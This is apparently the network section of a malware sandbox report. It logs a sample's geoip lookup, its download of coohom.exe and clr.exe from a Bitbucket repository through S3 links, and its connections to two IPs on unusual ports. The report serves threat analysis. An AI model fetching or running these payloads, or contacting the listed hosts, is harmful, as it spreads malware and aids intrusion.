Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
bitbucket.org | 104.192.141.1 | |
bbuseruploads.s3.amazonaws.com | CNAME s3-1-w.amazonaws.com; 52.216.152.244 | |
api.ip.sb | 104.26.13.31 | |
- TCP Requests
  - 192.168.56.102:49818 -> 104.192.141.1:443 (bitbucket.org)
  - 192.168.56.102:49811 -> 104.26.13.31:443 (api.ip.sb)
  - 192.168.56.102:49832 -> 104.26.13.31:443 (api.ip.sb)
  - 192.168.56.102:49797 -> 172.217.25.14:443
  - 192.168.56.102:49810 -> 185.153.198.36:10202
  - 192.168.56.102:49819 -> 52.216.30.156:443 (bbuseruploads.s3.amazonaws.com)
  - 192.168.56.102:49831 -> 74.119.193.164:3214
- UDP Requests
  - 192.168.56.102:50839 -> 164.124.101.2:53
  - 192.168.56.102:57660 -> 164.124.101.2:53
  - 192.168.56.102:61459 -> 164.124.101.2:53
  - 192.168.56.102:137 -> 192.168.56.255:137
  - 192.168.56.102:138 -> 192.168.56.255:138
  - 192.168.56.102:49152 -> 239.255.255.250:3702
  - 192.168.56.102:56752 -> 239.255.255.250:1900
  - 192.168.56.102:56754 -> 239.255.255.250:3702
  - 192.168.56.102:56756 -> 239.255.255.250:3702
  - 192.168.56.102:56758 -> 239.255.255.250:3702
GET 200 https://api.ip.sb/geoip
REQUEST
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:39:52 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d9e9d9dcbf0effcd13a3574cb0a3fb83e1616402392; expires=Wed, 21-Apr-21 08:39:52 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08fab03e4d0000eb91809d2000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=f4gQJqMOiq2FkL%2B5fJRZMZs1RgilJkh41HKc1AXxIrRTn3HeeXo525M4CstmcuoDR1e87EPYap89%2BcDCFjeZANBdJACC2Pj9voo%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633e1caa1ca1eb91-LAX
GET 302 https://bitbucket.org/mminminminmin05/testtest/downloads/coohom.exe
REQUEST
GET /mminminminmin05/testtest/downloads/coohom.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
RESPONSE
HTTP/1.1 302 Found
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
Vary: Accept-Language, Cookie
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: 6b5531fcaa10830a
X-Dc-Location: ash2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 22 Mar 2021 08:40:03 GMT
Location: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
X-Served-By: app-3021
Expires: Mon, 22 Mar 2021 08:40:03 GMT
Content-Language: en
X-Static-Version: 7d7e05cb8b56
X-Content-Type-Options: nosniff
X-Render-Time: 0.0390648841858
Connection: Keep-Alive
X-Request-Count: 2532
X-Frame-Options: SAMEORIGIN
X-Version: 7d7e05cb8b56
DC-Location: ash2
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET 200 https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22
REQUEST
GET /17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/63bdc9c9-25c5-4481-bdd4-24e8b322c041/coohom.exe?Signature=3v5pHGYDnTWICGm2HBSijwU5Vm4%3D&Expires=1616404050&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj&response-content-disposition=attachment%3B%20filename%3D%22coohom.exe%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
x-amz-id-2: KARKJjXXCbR8SAMAjNcskRPUWH5LywNXYaA+WJYyxHxVILTDdga4Vm/GcKWZKFMUwWrTz4Cg9CI=
x-amz-request-id: BRJCCBTW4D27VXZV
Date: Mon, 22 Mar 2021 08:40:05 GMT
Last-Modified: Sun, 21 Mar 2021 23:08:12 GMT
ETag: "5ca4b0570d73158cc763c46042b46115-2"
x-amz-version-id: vbsVworim5F6JZGDNseQH1r3xUaTZ3Gj
Content-Disposition: attachment; filename="coohom.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 9545648
Server: AmazonS3
GET 302 https://bitbucket.org/mminminminmin05/testtest/downloads/clr.exe
REQUEST
GET /mminminminmin05/testtest/downloads/clr.exe HTTP/1.1
Host: bitbucket.org
RESPONSE
HTTP/1.1 302 Found
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
Vary: Accept-Language, Cookie
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: d88c3891fe39818e
X-Dc-Location: ash2
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 22 Mar 2021 08:40:12 GMT
Location: https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22
X-Served-By: app-3015
Expires: Mon, 22 Mar 2021 08:40:12 GMT
Content-Language: en
X-Static-Version: 7d7e05cb8b56
X-Content-Type-Options: nosniff
X-Render-Time: 0.034187078476
Connection: Keep-Alive
X-Request-Count: 1824
X-Frame-Options: SAMEORIGIN
X-Version: 7d7e05cb8b56
DC-Location: ash2
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET 200 https://bbuseruploads.s3.amazonaws.com/17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22
REQUEST
GET /17d04c6a-c1d1-40c0-985a-f0740a053130/downloads/f827393c-b39f-450b-8854-d15458efc0cd/clr.exe?Signature=iv2dAOS7O5uDtcuy6pQLlA38CIQ%3D&Expires=1616403908&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=navAx2o.B364539FO2C5fA3kQTj_uTIH&response-content-disposition=attachment%3B%20filename%3D%22clr.exe%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
RESPONSE
HTTP/1.1 200 OK
x-amz-id-2: 5ztc37tsGARSN+tuBIuKytRcjNOQOtlrjOt2cYawjTGl7EuZICy9i3yp7ONK5CPdw2NR6QpgMqA=
x-amz-request-id: WE4Y6BJCJJMQ4A48
Date: Mon, 22 Mar 2021 08:40:13 GMT
Last-Modified: Sun, 21 Mar 2021 23:06:33 GMT
ETag: "3a7d2f1815f84f8f678af316d2475e34"
x-amz-version-id: navAx2o.B364539FO2C5fA3kQTj_uTIH
Content-Disposition: attachment; filename="clr.exe"
Accept-Ranges: bytes
Content-Type: application/x-msdownload
Content-Length: 209408
Server: AmazonS3
GET 200 https://api.ip.sb/geoip
REQUEST
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 08:40:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d6e230580ab92435cb7056c4f5b6292841616402425; expires=Wed, 21-Apr-21 08:40:25 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08fab0bf7b000098213d02f000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a3bCWz1CN9%2B9BoxvzHeIMlps%2FG1bs4pKlHz4P3mSBu%2BrY485N2VUUQkzAxCt9%2BS7pmaEkNrPsO8JqFlvFzXf3JEZrCMcL%2B0t%2BXc%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633e1d78cfe09821-LAX
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49811 -> 104.26.13.31:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49818 -> 104.192.141.1:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org | 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0 |
TLS 1.2 192.168.56.102:49819 -> 52.216.30.156:443 | C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2 | C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=*.s3.amazonaws.com | 90:e0:af:dc:fa:f7:0b:ac:50:bb:fa:43:e1:ec:e2:3d:ce:91:90:47 |
TLSv1 192.168.56.102:49832 -> 104.26.13.31:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
Snort Alerts
No Snort Alerts